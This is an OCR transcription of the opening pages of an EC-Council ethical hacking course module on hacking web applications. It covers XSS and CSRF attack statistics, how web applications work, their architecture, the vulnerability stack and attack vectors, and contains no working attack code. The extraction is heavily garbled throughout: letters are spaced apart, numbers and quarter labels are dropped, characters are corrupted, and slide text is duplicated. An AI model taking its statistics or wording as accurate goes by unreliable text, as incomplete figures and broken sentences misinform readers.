Hacking Web Applications. M o d u l e 1 3

Transcription

1 Hacking Web Applications M o d u l e 1 3

2 Ethical Hacking and Countermeasures Hacking Web Applications H a c k i n g W e b A p p lic a t io n s M o d u l e 1 3 Engineered by Hackers. P resented by Professionals. CEH a E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8 M o d u l e 1 3 : H a c k i n g W e b A p p l i c a t i o n s E x a m Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

3 Ethical Hacking and Countermeasures Hacking Web Applications S e c u r it y N e w s CEH S e c u r i t y N e w s X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e S o u rc e : h t t p : / / w w w. d a r k r e a d i n g. c o m S e c u re c lo u d h o s tin g c o m p a n y, F ire H o s t, h a s t o d a y a n n o u n c e d t h e f in d in g s o f its la te s t w e b a p p lic a tio n a t ta c k r e p o r t, w h ic h p r o v id e s s ta tis tic a l a n a ly s is o f t h e 1 5 m illio n c y b e r - a tta c k s b lo c k e d b y its s e rv e rs in t h e US a n d E u ro p e d u r in g Q T h e r e p o r t lo o k s a t a tta c k s o n t h e w e b a p p lic a tio n s, d a ta b a s e s a n d w e b s ite s o f F ire H o s t's c u s t o m e r s b e t w e e n J u ly a n d S e p te m b e r, a n d o ffe r s a n im p r e s s io n o f t h e c u r r e n t in t e r n e t s e c u r it y c lim a t e as a w h o le. A m o n g s t t h e c y b e r - a tta c k s r e g is te r e d in t h e r e p o r t, F ire H o s t c a te g o r is e s f o u r a t ta c k ty p e s in p a r t ic u la r as r e p r e s e n tin g t h e m o s t s e rio u s t h r e a t. T h e s e a t t a c k ty p e s a re a m o n g F ire H o s t's,s u p e r fe c ta ' a n d t h e y c o n s is t o f C ro s s -s ite S c r ip tin g (XSS), D ir e c t o r y T ra v e rs a ls, SQ L In je c tio n s, a n d C ro s s -s ite R e q u e s t F o r g e ry (CSRF). O n e o f t h e m o s t s ig n if ic a n t c h a n g e s in a t ta c k t r a f f ic s e e n b y F ire H o s t b e t w e e n Q 2 a n d Q w a s a c o n s id e r a b le rise in t h e n u m b e r o f c ro s s -s ite a tta c k s, in p a r t ic u la r XSS a n d CSRF a tta c k s ro s e t o r e p r e s e n t 6 4 % o f t h e g r o u p in t h e t h ir d q u a r t e r (a 2 8 % in c re a s e d p e n e t r a t io n ). XSS is n o w t h e m o s t c o m m o n a t ta c k t y p e in t h e S u p e r fe c ta, w it h CSRF n o w in s e c o n d. F ire H o s t's s e rv e rs b lo c k e d m o r e t h a n o n e m illio n XSS a tta c k s d u r in g th is p e r io d a lo n e, a f ig u r e w h ic h ro s e Module 13 Page 1725 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

4 Ethical Hacking and Countermeasures Hacking Web Applications 69%, fro m 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on th e S uperfecta at 843,517. Cross-site attacks are d e p e n d e n t upon th e tru s t de ve lop e d b e tw e e n site and user. XSS attacks involve a w e b a p plication g a th e rin g m alicious data fro m a user via a tru s te d site (o fte n com ing in th e fo rm o f a h yp e rlin k co n ta in in g m alicious co n te n t), w h e re a s CSRF attacks e xp lo it th e tru s t th a t a site has fo r a p a rticu la r user instead. These m a licio u s se c u rity e x p lo its can also be used to steal sensitive in fo rm a tio n such as user nam es, passw ords and cre d it card details - w ith o u t th e site o r user's know ledge. The se verity o f these attacks is d e p e n d e n t on th e sen sitivity o f th e data handled by the vu ln e ra b le site and this ranges fro m personal data fo u n d on social n e tw o rk in g sites, to th e financial and co n fid e n tia l details e n te re d on e c o m m e rce sites a m o n g st others. A gre a t n u m b e r o f organisations have fallen victim to such attacks in re ce n t years including attacks on PayPal, H otm a il and ebay, th e la tte r falling victim to a single CSRF attack in 2008 w h ich ta rg e te d 18 m illio n users o f its Korean w e b site. F u rth e rm o re in S e p te m b e r this year, IT giants M ic ro s o ft and G oogle C hrom e b o th ran extensive patches ta rg e te d at securing XSS flaw s, high lig h tin g th e prevalence o f this g ro w in g onlin e th re a t. "Cross-site attacks are a severe th re a t to business ope ra tio n s, especially if servers a re n 't p ro p e rly pre p a red," said Chris H inkley, CISSP - a S enior S ecurity Engineer at FireHost. "It's vital th a t any site dealing w ith co n fid e n tia l o r p riva te user data takes th e necessary p reca utions to ensure applicatio ns rem a in p ro te cte d. Locating and fixing any w e b site v u ln e ra b ilitie s and fla w s is a key step in ensuring y o u r business and y o u r custom ers, d o n 't fall victim to an atta ck o f this natu re. The consequences o f w h ich can be significant, in te rm s o f b o th financial and re p u ta tio n a l dam age." The S uperfecta atta ck tra ffic fo r Q can be bro ken d o w n as follo w s: As w ith Q2 2012, th e m a jo rity o f attacks FireHost blocked d uring th e th ird calendar q u a rte r o f 2012 orig in a te d in th e U nited States ( llm illio n / 74%). There has h o w e ver, been a gre at shift in th e n u m b e r o f attacks o rig in a tin g fro m Europe this q u a rte r, as 17% o f all m alicious atta ck tra ffic seen by FireHost cam e fro m this region. Europe o v e rto o k S outhern Asia (w hich w as responsible fo r 6%), to b e co m e th e second m o st likely origin o f m alicious traffic. V aried tre n d s am o n g th e S uperfecta a tta ck te ch n iq u e s are d e m o n s tra te d b e tw e e n this q u a rte r and last: D uring th e build up to th e h o liday season, e c o m m e rc e a ctivity ram ps up d ra m a tica lly and cyber-attacks th a t ta rg e t w e b site users' co n fid e n tia l data are also likely to increase as a result. As w ell as cross-site attacks, th e o th e r S uperfecta attack types, SQL Injection and D irecto ry Transversal, still rem ain a significant th re a t despite a slight re d u ctio n in fre q u e n c y this q u a rte r. E com m erce businesses need to be aw are o f th e risks th a t this p eriod m ay prese nt it to its security, as T odd Gleason, D ire cto r o f T e chnolo gy at FireHost explains, "Y ou'd b e tte r believe th a t hackers w ill try and take advantage o f any surges in holiday shopping. They w ill be devising a n u m b e r o f w ays th e y can take advantage o f any w e b a p plication vu ln e ra b ilitie s and w ill use an a s s o rtm e n t o f d iffe re n t atta ck types and te ch n iq u e s to do so. W h e n it's a m a tte r of Module 13 Page 1726 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

5 Ethical Hacking and Countermeasures Hacking Web Applications c o n f id e n t ia l d a ta a t risk, in c lu d in g c u s t o m e r 's fin a n c ia l in f o r m a t io n - c r e d it c a rd a n d d e b it c a rd d e ta ils - t h e r e 's n o r o o m f o r c o m p la c e n c y. T h e s e o r g a n is a tio n s n e e d t o k n o w t h a t t h e r e 's a n in c re a s e d lik e lih o o d o f a t ta c k d u r in g th is t im e a n d it's t h e ir r e s p o n s ib ility t o ta k e t h e n e c e s s a ry s te p s t o s to p s u c h a tta c k s." Copyright 2013 UBM Tech, A ll rights reserved w.darkreading.com /5ecuritv/new s/ /firehost-q3-w eb-application-report-xssattacks-lead-pack-as-m ost-frequent-attack-type.htm l Module 13 Page 1727 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

6 Ethical Hacking and Countermeasures Hacking Web Applications M o d u l e O b j e c t i v e s CEH J How Web Applications Work J Session M anagem ent Attack J Web Attack Vectors J Attack Data Connectivity J Web Application Threats J Attack Web App Client J Web App Hacking M ethodology J Attack Web Services J Footprint Web Infrastructure ^ J Web Application Hacking Tools J Hacking W ebservers /1 J Counterm easures J Analyze Web Applications J Web Application Security Tools J Attack A uthentication Mechanism J Web Application Firewall J Attack Authorization Schemes J Web Application Pen Testing Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e O b j e c t i v e s The m ain o b je ctive o f this m o d u le is to sh o w th e various kinds o f vu ln e ra b ilitie s th a t can be discovered in w e b applications. The attacks e xp lo itin g these vu ln e ra b ilitie s are also highlighted. The m o d u le starts w ith a d e ta iled descrip tio n o f th e w e b applications. V arious w e b a p plication th re a ts are m e n tio n e d. The h acking m e th o d o lo g y reveals th e various steps involved in a planned attack. The various to o ls th a t attackers use are discussed to explain the w a y th e y e x p lo it vu ln e ra b ilitie s in w e b applications. T he c o u n te rm e a s u re s th a t can be ta ke n to th w a rt any such attacks are also high lighted. S ecurity tools th a t help n e tw o rk a d m in is tra to r to m o n ito r and m anage th e w e b a p plication are described. Finally w e b a p plica tion pen te s tin g is discussed. This m o d u le fam iliarizes you w ith : Module 13 Page 1728 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

7 Ethical Hacking and Countermeasures Hacking Web Applications H o w W e b A pp lica tio n s W o rk - Session M a n a g e m e n t A tta ck W e b A tta ck V ectors S A tta ck Data C o n n ectivity A W e b A p p lica tio n T hreats S A tta ck W e b A pp C lient W e b A pp Hacking M e th o d o lo g y s A tta ck W e b Services F o o tp rin t W e b In fra stru ctu re S W e b A p p lica tio n Hacking Tools H acking W ebservers S C o un te rm easures A A nalyze W e b A p p lications s W e b A p p lica tio n S ecurity Tools A A tta ck A u th e n tic a tio n M echan ism s W e b A p p lica tio n Firewall A A tta ck A u th o riz a tio n Schem es S W e b A p p lica tio n Pen Testing Module 3 Page 1729 Ethical Hacking and Countermeasures Copyright by EC C0UI1Cil All Rights Reserved. Reproduction is Strictly Prohibited.

8 Ethical Hacking and Countermeasures Hacking Web Applications Copyright by E & C oinal. All Rights Reserved. Reproduction is Strictly Prohibited. ^ M o d u l e F l o w W e b application s are th e a p plication program s accessed only w ith In te rn e t co n n e ctio n enabled. These a pplication s use HTTP as th e ir p rim a ry c o m m u n ic a tio n p ro to c o l. G enerally, th e attackers ta rg e t these apps fo r several reasons. They are exposed to various attacks. For clear u n d e rsta n d in g o f th e "ha cking w e b a p p lica tio n s" w e divided th e co n ce p t in to various sections. Q Q W e b A pp C oncepts W e b A pp T hreats Hacking M e th o d o lo g y Q W e b A p p lica tio n Hacking Tools C o u nterm easures 0 S ecurity Tools W e b A pp Pen Testing Let us begin w ith th e W e b A pp concepts. Module 13 Page 1730 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

9 Ethical Hacking and Countermeasures Hacking Web Applications ^ ^ W e b A p p P e n T e s tin g W e b A p p C oncepts S ecurity Tools W e b A p p T h re a ts C o u n te rm e a su re s ^ H acking M e th o d o lo g y W e b A p p lic a tio n H acking T ools T h is s e c tio n in t r o d u c e s y o u t o t h e w e b a p p lic a tio n a n d its c o m p o n e n t s, e x p la in s h o w t h e w e b a p p lic a tio n w o r k s, a n d its a r c h it e c t u r e. It p r o v id e s in s ig h t in t o w e b 2.0 a p p lic a tio n, v u ln e r a b ilit y s ta c k s, a n d w e b a t t a c k v e c to r s. Module 13 Page 1731 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

10 Ethical Hacking and Countermeasures Hacking Web Applications Web A pplication Security Statistics CEH Cross-Site Scripting Information Leakage Copyright by E tc tin d l. All Rights Reserved. Reproduction is Strictly Prohibited. f f W e b A p p l i c a t i o n S e c u r i t y S t a t i s t i c s ~ Source: h ttp s ://w w w.w h ite h a ts e c.c o m A ccording to th e W HITEHAT se curity w e b site statistics re p o rt in 2012, it is clear th a t th e crosssite s c rip tin g vu ln e ra b ilitie s are fo u n d on m o re w e b a pp lica tions w h e n co m p a re d to o th e r vuln e ra b ilitie s. From th e graph you can observe th a t in th e year 2012, cross-site scripting vu ln e ra b ilitie s are th e m o st c o m m o n vu ln e ra b ilitie s fo u n d in 55% o f th e w e b applications. O nly 10% o f w e b ap p lica tio n attacks are based on in su fficie nt session e x p ira tio n vu ln e ra b ilitie s. In o rd e r to m in im ize th e risks associated w ith cross-site scripting vu ln e ra b ilitie s in th e w e b applications, you have to a d o p t necessary co u n te rm e a su re s against th e m. Module 13 Page 1732 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

11 Ethical Hacking and Countermeasures Hacking Web Applications W O Cross-Site Scripting Inform ation Leakage a >4 Qa I H C o H 16% Content Spoofing Insufficient A uthorization L Cross-Site Request Forgery Brute Force 0 H a. Predictable Resource Location SQL Injection a 1 10% Session Fixation Insufficient Session Expiration FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012 Module 13 Page 1733 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

12 Ethical Hacking and Countermeasures Hacking Web Applications I n t r o d u c t i o n t o W e b A p p l i c a t i o n s C E H W e b a p p lic a tio n s p r o v id e an in te rfa c e b e tw e e n e n d users a n d w e b s e rv e rs th ro u g h a se t o f w e b p ages th a t a re g e n e ra te d a t th e s e rv e r e n d o r c o n ta in s c rip t c o d e to b e e x e c u te d d y n a m ic a lly w ith in th e c lie n t w e b b ro w s e r T h o u g h w e b a p p lic a tio n s e n fo rc e c e rta in s e c u rity p o lic ie s, th e y a re v u ln e ra b le to v a rio u s a tta c k s su ch as SQL in je c tio n, c ro s s -s ite s c rip tin g, \ *, se ssio n h ija c k in g, e tc. W e b a p p lic a t io n s a n d W e b 2.0 te c h n o lo g ie s a r e in v a r ia b ly u s e d to s u p p o r t c r itic a l b u s in e s s fu n c tio n s s u c h as C R M, S C M, e tc. a n d im p r o v e b u s in e s s e ffic ie n c y N e w w e b te c h n o lo g ie s such as W e b 2.0 p ro v id e m o re a tta c k s u rfa c e fo r w e b a p p lic a tio n e x p lo ita tio n C o pyright by E&C01nal. A ll R ights Reserved. Reproduction is S trictly Prohibited. I n t r o d u c t i o n t o W e b A p p l i c a t i o n s W eb applicatio ns are th e applica tio n th a t run on th e re m o te w eb server and send th e o u tp u t over th e In te rn e t. W eb 2.0 technolo gies are used by all th e applicatio ns based on th e w eb-based servers such as c o m m u n ic a tio n w ith users, clients, th ird -p a rty users, etc. A w eb applica tio n is com prised o f m any layers o f fu n c tio n a lity. H ow ever, it is considered a th re e -la y e re d a rch ite ctu re consisting o f p re senta tio n, logic, and data layers. The w eb a rc h ite c tu re relies substa n tia lly on th e te chnolo g y popularized by th e W o rld W ide W eb, H yperte xt M arkup Language (HTML), and th e p rim a ry tra n s p o rt m edium, e.g. H yper Text T ransfer P rotocol (HTTP). HTTP is th e m edium o f c o m m u n icatio n b e tw een th e server and th e clie n t. Typically, it operates over TCP p o rt 80, b u t it m ay also com m u n icate o ver an unused p o rt. W eb applicatio ns provide an in te rfa ce b e tw een end users and w eb servers th ro u g h a set o f w eb pages th a t are generated at th e server end o r contain script code to be executed dynam ically w ith in th e clie n t w eb brow ser. Some o f th e p o pula r w eb servers present to d a y are M ic ro s o ft IIS, Apache S oftw are F oundatio n's Apache HTTP Server, A O L/N etscape's E nterprise Server, and Sun One. Resources are called U n ifo rm Resource Id e n tifie rs (URIs), and th e y m ay e ith e r be static pages or contain dynam ic c o n te n t. Since HTTP is stateless, e.g., th e p ro to c o l does n o t m a in ta in a session state, Module 13 Page 1734 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

13 Ethical Hacking and Countermeasures Hacking Web Applications th e requests fo r resources are tre a te d as separate and unique. Thus, th e in te g rity o f a link is not m a in ta in e d w ith th e client. Cookies can be used as tokens, w hich servers hand over to clients to a llo w access to w ebsites. H ow ever, cookies are n o t p e rfe ct fro m a security p o in t o f vie w because th e y can be copied and stored on th e clie n t's local hard disk, so th a t users do n o t have to request a to ke n fo r each query. Though w eb applicatio ns enforce certain security policies, th e y are vu lnerable to various attacks such as SQL in je ctio n, cross-site scripting, session hijacking, etc. O rganizations rely on w e b a p p lic a tio n s and W eb 2.0 technolo gies to su p p o rt key business processes and im prove p e rform ance. New w eb technolo gies such as W eb 2.0 provide m ore a tta ck surface fo r w eb applica tio n e x p lo ita tio n. A ttackers use d iffe re n t types o f vu ln e ra b ilitie s th a t can be discovered in w eb applicatio ns and e x p lo it th e m to com prom ise w eb applications. A ttackers also use to o ls to launch attacks on w eb applications. Module 13 Page 1735 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

14 Ethical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n C o m p o n e n t s C Urtifwd E H itfcmjl NMhM 1 IS C o pyright by E&Coinal. A ll R ights Reserved. Reproduction is S trictly Prohibited. ^ W e b A p p l i c a t i o n C o m p o n e n t s The co m p o n e n ts o f w eb applicatio ns are listed as fo llo w s Login: M o st o f th e w ebsites a llo w a u th e n tic users to access th e applica tio n by means o f login. It means th a t to access th e service o r c o n te n t o ffe re d by th e w eb applica tio n user needs to su b m it h is /h e r usernam e and passw ord. Example gm ail.com The Web Server: It refers to e ith e r s o ftw a re o r hard w a re in te n d e d to d e liver w eb c o n te n t th a t can be accessed th ro u g h th e In te rn e t. An exam ple is th e w eb pages served to th e w eb brow ser by th e w eb server. Session Tracking Mechanism: Each w eb applica tio n has a session tra c k in g m echanism. The session can be tracked by using cookies, URL re w ritin g, o r Secure Sockets Layer (SSL) in fo rm a tio n. User Permissions: W hen you are n o t allow ed to access th e specified w eb page in w hich you are logged in w ith user perm issions, you m ay re d ire ct again to th e login page or to any o th e r page. The Application Content: It is an in te ra ctive program th a t accepts w eb requests by clients and uses th e param eters th a t are sent by th e w eb bro w se r fo r carrying o u t certain fu n ctio n s. Data Access: Usually th e w eb pages w ill be conta ctin g w ith each o th e r via a data access lib ra ry in w hich all th e database details are stored. Module 13 Page 1736 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

15 Ethical Hacking and Countermeasures Hacking Web Applications The Data Store: It is a w ay to th e im p o rta n t data th a t is shared and synchronized b e tw e e n th e c h ild re n /th re a ts. This stored in fo rm a tio n is q u ite im p o rta n t and necessary fo r higher levels o f th e applica tio n fra m e w o rk. It is n o t m a n d a to ry th a t th e data store and th e w eb server are on th e same n e tw o rk. They can be in conta ct or accessible w ith each o th e r th ro u g h th e n e tw o rk connectio n. Role-level System Security Application Logic: Usually w eb applicatio ns are divided in to tie rs o f w hich th e applica tio n logic is th e m iddle tie r. It receives th e request fro m th e w eb b ro w se r and gives it services accordingly. The services o ffe re d by th e applica tio n logic include asking questions and giving th e latest updates against th e database as w e ll as g e neratin g a user in te rfa ce. Logout: An individual can shut dow n or log o u t o f th e w eb applica tio n or b ro w se r so th a t th e session and th e applica tio n associated w ith it end. The a p p licatio n ends e ith e r by ta kin g the in itia tiv e by th e applica tio n logic or by a u to m a tica lly ending w hen th e se rvle t session tim e s o u t. Module 13 Page 1737 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

16 Ethical Hacking and Countermeasures Hacking Web Applications H o w W e b A p p l i c a t i o n s W o r k C E H ID Topic News 6329 Tech CNN O u tp u t SELECT * fro m new s w h e re i d = 6329 C o pyright by E&C01nal. A ll R ights Reserved. Reproduction is S trictly Prohibited. H o w W e b A p p l i c a t i o n s W o r k W h e n e ver som eone clicks or types in th e brow ser, im m e d ia te ly th e requested w ebsite or conte n t is displayed on th e screen o f th e co m p u te r, b u t w h a t is th e m echanism behind this? This is th e step-by-step process th a t takes place once a user sends a request fo r p a rticu la r c o n te n t o r a w e b site w h e re m u ltip le co m p u te rs are involved. The w eb applica tio n m odel is explained in th re e layers. The firs t layer deals w ith th e user in p u t th ro u g h a w eb b ro w ser o r user interface. The second layer contains JSP (Java servlets) o r ASP (Active Server Pages), th e dynam ic c o n te n t g e n e ra tio n te c h n o lo g y to o ls, and th e last layer contains th e database fo r storing custo m e r data such as user nam es and passwords, c re d it card details, etc. o r o th e r related in fo rm a tio n. Let's see h ow th e user trig g e rs th e in itia l request th ro u g h th e bro w se r to th e w eb applica tio n server: First th e user types th e w e b site nam e or URL in th e bro w se r and th e request is sent to th e w eb server. On receiving th e request,th e w e b se rver checks th e file extension: If th e user requests a sim ple w eb page w ith an HTM or HTML extension, th e w eb server processes th e request and sends th e file to th e user's brow ser. Module 13 Page 1738 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

17 Ethical Hacking and Countermeasures Hacking Web Applications If th e user requests a w eb page w ith th e extension CFM, CFML, or CFC, th e n th e request m ust be processed by th e w eb applica tio n server. T h e refore, th e w eb server passes th e user's request to th e w eb applica tio n server. The user's request is now processed by th e w eb a p p lic a tio n server. In o rd e r to process th e user's request, th e w eb server accesses th e database placed at th e th ird layer to p e rfo rm th e requested task by updatin g or re trie v in g th e in fo rm a tio n stored on th e database. Once done processing th e request, w eb applica tio n server sends th e results to th e w eb server, w hich in tu rn sends th e results to th e user's brow ser. User Login Form Internet Firewall Web Server FIGURE : W o r k in g o f W e b A p p lic a tio n Module 13 Page 1739 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

18 Ethical Hacking and Countermeasures Hacking Web Applications W e b A p p l i c a t i o n A r c h i t e c t u r e C E H Clients y ^ lln t e m e r N ( W e b Services Business Layer A pplication Server J2EE.NET COM XCode C++ COM+ Business Logic Legacy Application Data Access P re s e n ta tio n Laye r Firew all HTTP Request Parser Proxy Server, ה Cache S ervlet C o n ta in e r R esource H andler A u th e n tica tio n and Login Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited. W e b A p p l i c a t i o n A r c h i t e c t u r e All w eb applicatio ns execute w ith th e help o f th e w eb bro w se r as a support clie n t. The w eb applicatio ns use a group o f server-side scripts (ASP, PHP, etc.) and c lie n t-sid e scripts (HTML, JavaScript, etc.) to execute th e applica tio n. The in fo rm a tio n is presented by using th e client-side script and th e hardw are tasks such as storing and gath e rin g re q uired data by th e server-side scrip t. In th e fo llo w in g a rchite ctu re, th e clients uses d iffe re n t devices, w eb brow sers, and external w eb services w ith th e In te rn e t to get th e a p p licatio n executed using d iffe re n t scripting languages. The data access is handled by th e database la yer using clo u d services and a database server. Module 13 Page 1740 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

19 Ethical Hacking and Countermeasures Hacking Web Applications Clients Business Layer, U ו S _ Smart Phonas, Web Appliance Presentation ל ג layerד י י F la s h. S ilv e r lljh t. Java Scrip ( ' * V ^External 1 W eb S«rvic*1 W eb Browser Application Server J2EE.NET COM XCode C+ COM Business logic legacy Application Web Server Data Access Prssantation Layer Firewall HTTP Request Parser fproxy Server, Cache Servlet Resource Authentication Container Handler and Login Database Layer Cloud Services Database Server FIGURE : W e b A p p lic a tio n A r c h ite c tu r e Module 13 Page 1741 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

20 Ethical Hacking and Countermeasures Hacking Web Applications W e b 2. 0 A p p l i c a t i o n s C E H C«rt1fW4 itfciul NMkM J W e b 2.0 re fe rs to a n e w g e n e ra tio n o f W e b a p p lic a tio n s th a t p r o v id e an in fra s tru c tu re fo r m o re d y n a m ic u ser p a r tic ip a tio n, so cia l in te ra c tio n a n d c o lla b o ra tio n Blogs (Wordpress) Q Advanced gaming New technologies like AJAX (Gmail, YouTube) M obile application (iphone) O Q ODynamic as opposed to static site content ORSS-generated syndication Flash rich interface websites Fram ew orks (Yahool Ul Library, jq uery) O?' ' rid.. v O Social n e tw o rk in g sites (Flickr, ' Facebook, del.cio.us) ' Q Mash-ups ( s, IMs, Electronic f payment systems) Cloud computing websites like W (amazon.com) ^ Interactive encyclopedias and dictionaries O ine office software (Google Docs and Microsoft light) o o OW ikis and other collaborative applications Q Google Base and other free Web services (Google Maps) Ease o f data creation, m o d ifica tio n, o r deletion by individual users C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. W e b 2. 0 A p p l i c a t i o n s W eb 2.0 refers to a new genera tio n o f w eb applicatio ns th a t provide an in fra s tru c tu re fo r m ore dynam ic user p a rticip a tio n, social in te ra c tio n, and c o lla b o ra tio n. It o ffe rs various fe a tu re s such as: Advanced gam ing D ynam ic as opposed to static site conte n t RSS-generated syn d ication Social n e tw o rk in g sites (Flickr, Facebook, del.cio.us) M ash-ups (em ails, IMs, e le ctro n ic p a ym e n t system s) W ikis and o th e r colla b o ra tive applicatio ns Google Base and o th e r fre e w eb services (Google M aps) Ease o f data cre a tio n, m o d ific a tio n, or d e le tio n by individual users O nline office s o ftw a re (Google Docs and M ic ro s o ft Light) In te ra ctive encyclopedias and dictio n a rie s Cloud c o m p u tin g w ebsites such as A m azon.com Module 13 Page 1742 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

21 Ethical Hacking and Countermeasures Hacking Web Applications 6 F ram ew orks (Yahoo! Ul Library, j Q uery) Flash-rich in te rfa ce w ebsites Q Q M o b ile a p p licatio n (iphone) New technolo gies like AJAX (Gmail, YouTube) Blogs (W ordpress) Module 13 Page 1743 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

22 Ethical Hacking and Countermeasures Hacking Web Applications V u l n e r a b i l i t y S t a c k C E H _ C u s to m W e b A p p lic a tio n s B _ B u s in e s s L o g ic F la w s T e c h n ic a l V u ln e r a b ilit ie s T h ir d P a r ty C o m p o n e n ts E l E O p e n S o u rc e / C o m m e r c ia l D a ta b a s e f ^ w r O ra c le / M y S Q L / M S SQL W e b S e rv e r Apache A p a c h e / M ic r o s o f t IIS O p e r a tin g S y s te m W in d o w s / L in u x /OSX N e t w o r k R o u te r / S w itc h S e c u rity IPS / IDS C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. V u l n e r a b i l i t y S t a c k i f - The w eb applicatio ns are m a intained and accessed th ro u g h various levels th a t include: custom w eb applications, th ird -p a rty com ponents, databases, w eb servers, o p e ra tin g systems, netw orks, and security. All th e m echanism s o r services em ployed a t each level help th e user in one o r th e o th e r w ay to access th e w eb applica tio n securely. W hen ta lkin g a b o u t w eb applications, security is a critical co m p o n e n t to be considered because w eb applicatio ns are a m a jo r sources o f attacks. The fo llo w in g v u ln e ra b ility stack shows th e levels and th e corresponding e le m e n t/m e ch a n ism /se rvice em ployed at each level th a t makes th e w eb applicatio ns vuln e ra b le : Module 13 Page 1744 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

23 Ethical Hacking and Countermeasures Hacking Web Applications Custom Web Applications Business Logic Flaws Technical Vulnerabilities Third Party Components Open Source / Commercial Oracle / MySQL / MS SQL Apache / Microsoft IIS W indows / Linux /O S X Router / Switch Security IPS /ID S FIGURE : V u ln e r a b ility S ta ck Module 13 Page 1745 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

24 Ethical Hacking and Countermeasures Hacking Web Applications - W e b A t t a c k V e c t o r s C E H A n a tta c k v e c to r is a p a th o r m e a n s b y w h ic h a n a tta c k e r c a n g a in w a ccess t o c o m p u t e r o r n e t w o r k r e s o u rc e s in o r d e r t o d e liv e r a n a tta c k p a y lo a d o r c a u s e a m a lic io u s o u t c o m e ( A tta c k v e c to r s in c lu d e p a r a m e te r m a n ip u la tio n, X M L p o is o n in g, c lie n t v a lid a tio n, s e r v e r m is c o n fig u r a t io n, w e b s e rv ic e r o u t in g is s u e s, a n d c ro s s -s ite s c r ip tin g S e c u rity c o n t r o ls n e e d t o b e u p d a te d c o n t in u o u s ly as th e a tta c k v e c to r s k e e p c h a n g in g w it h r e s p e c t t o a ta r g e t o f a tta c k C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. W e b A t t a c k V e c t o r s An a tta ck vecto r is a m e th o d o f e n te rin g in to to u n a u th o riz e d system s to p e rfo rm in g m alicious attacks. Once th e atta cker gains access in to th e system or th e n e tw o rk he or she delivers an a tta ck payload or causes a m a licio u s o u tco m e. No p ro te c tio n m e th o d is com p le te ly a tta c k -p ro o f as a tta c k vecto rs keep changing and evolving w ith new technolo gical changes. Exam ples o f vario u s types o f a tta c k ve cto rs: P a ra m e te r m a n ip u la tio n : P roviding th e w ro n g in p u t value to th e w eb services by th e a tta cke r and gaining th e c o n tro l over th e SQL, LDAP, XPATH, and shell com m ands. W hen th e in co rre ct values are provided to th e w eb services, th e n th e y becom e vu ln e ra b le and are easily attacked by w eb applicatio ns running w ith w eb services. 0 XM L p oisonin g: A ttackers provide m a n ip u la te d XML d o cum ents th a t w hen executed can d istu rb th e logic o f parsing m e th o d on th e server. W hen huge XMLs are executed at th e applica tio n layer, th e n th e y can be easily be com prom ised by th e a tta cke r to launch his or her a tta ck and g a th e r in fo rm a tio n. C lient v a lid a tio n : M ost c lie n t-sid e va lid a tio n has to be su p p o rte d by server-side a u th e n tic a tio n. The AJAX ro u tin e s can be easily m anip u la te d, w hich in tu rn makes a w ay fo r attackers to handle SQL in je ctio n, LDAP in je ctio n, etc. and negotia te th e w eb a p p licatio n 's key resources. Module 13 Page 1746 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

